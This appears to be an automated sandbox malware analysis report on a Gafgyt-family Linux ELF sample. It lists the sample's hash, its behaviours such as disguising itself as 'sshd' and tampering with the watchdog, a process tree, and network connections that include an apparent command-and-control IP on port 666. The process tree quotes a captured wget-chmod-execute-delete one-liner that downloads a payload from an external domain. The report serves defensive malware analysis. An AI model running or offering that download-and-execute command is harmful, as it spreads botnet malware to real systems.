Malware Analysis Report

2025-08-05 23:59

Sample ID 240402-bnr8pacd71
Target a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
SHA256 a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf
Tags
gafgyt
score
10/10

Table of Contents

Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf

Threat Level: Known bad

The file a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf was found to be: Known bad.

Malicious Activity Summary

gafgyt

Gafgyt family

Detected Gafgyt variant

Changes its process name

Executes dropped EXE

Modifies Watchdog functionality

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 01:17

Signatures

Detected Gafgyt variant

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Gafgyt family

gafgyt

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 01:17

Reported

2024-04-02 01:20

Platform

ubuntu2004-amd64-20240221-en

Max time kernel

146s

Max time network

140s

Command Line

[/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf]

Signatures

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | /tmp/..... | /tmp/..... | N/A

Modifies Watchdog functionality

Description | Indicator | Process | Target
File opened for modification | /dev/watchdog | N/A | N/A
File opened for modification | /dev/misc/watchdog | N/A | N/A

Reads system routing table

Description | Indicator | Process | Target
File opened for reading | /proc/net/route | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A

Reads system network configuration

Description | Indicator | Process | Target
File opened for reading | /proc/net/route | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A

Writes file to tmp directory

Description | Indicator | Process | Target
File opened for modification | /tmp/..... | /usr/bin/wget | N/A

Processes

/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf

[/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf]

/bin/sh

[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]

/usr/bin/wget

[wget -q http://gay.energy/.../vivid -O .....]

/usr/bin/chmod

[chmod 777 .....]

/tmp/.....

[./.....]

/bin/sh

[/bin/sh ./.....]

/usr/bin/rm

[rm -rf .....]

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | | udp
MD | 85.239.33.129:666 | | tcp
US | 1.1.1.1:53 | gay.energy | udp
US | 1.1.1.1:53 | gay.energy | udp
US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp
US | 1.1.1.1:53 | cdn.fwupd.org | udp
US | 1.1.1.1:53 | cdn.fwupd.org | udp
US | 151.101.194.49:443 | cdn.fwupd.org | tcp
US | 1.1.1.1:53 | _http._tcp.security.ubuntu.com | udp
US | 1.1.1.1:53 | _https._tcp.deb.nodesource.com | udp
US | 1.1.1.1:53 | _http._tcp.nl.archive.ubuntu.com | udp
US | 1.1.1.1:53 | deb.nodesource.com | udp
US | 1.1.1.1:53 | deb.nodesource.com | udp
US | 1.1.1.1:53 | security.ubuntu.com | udp
US | 1.1.1.1:53 | security.ubuntu.com | udp
US | 1.1.1.1:53 | nl.archive.ubuntu.com | udp
US | 1.1.1.1:53 | nl.archive.ubuntu.com | udp
US | 91.189.91.82:80 | security.ubuntu.com | tcp
US | 104.22.4.26:443 | deb.nodesource.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
US | 151.101.194.49:443 | cdn.fwupd.org | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
US | 1.1.1.1:53 | _https._tcp.motd.ubuntu.com | udp
US | 1.1.1.1:53 | motd.ubuntu.com | udp
US | 1.1.1.1:53 | motd.ubuntu.com | udp
IE | 34.254.182.186:443 | motd.ubuntu.com | tcp
US | 1.1.1.1:53 | _https._tcp.esm.ubuntu.com | udp
US | 1.1.1.1:53 | esm.ubuntu.com | udp
US | 1.1.1.1:53 | esm.ubuntu.com | udp
US | 91.189.91.46:443 | esm.ubuntu.com | tcp
IE | 54.171.230.55:443 | motd.ubuntu.com | tcp
IE | 54.217.10.153:443 | motd.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
IE | 34.243.160.129:443 | motd.ubuntu.com | tcp
IE | 54.247.62.1:443 | motd.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
MD | 85.239.33.129:666 | | tcp
US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp
MD | 85.239.33.129:666 | | tcp

Files

N/A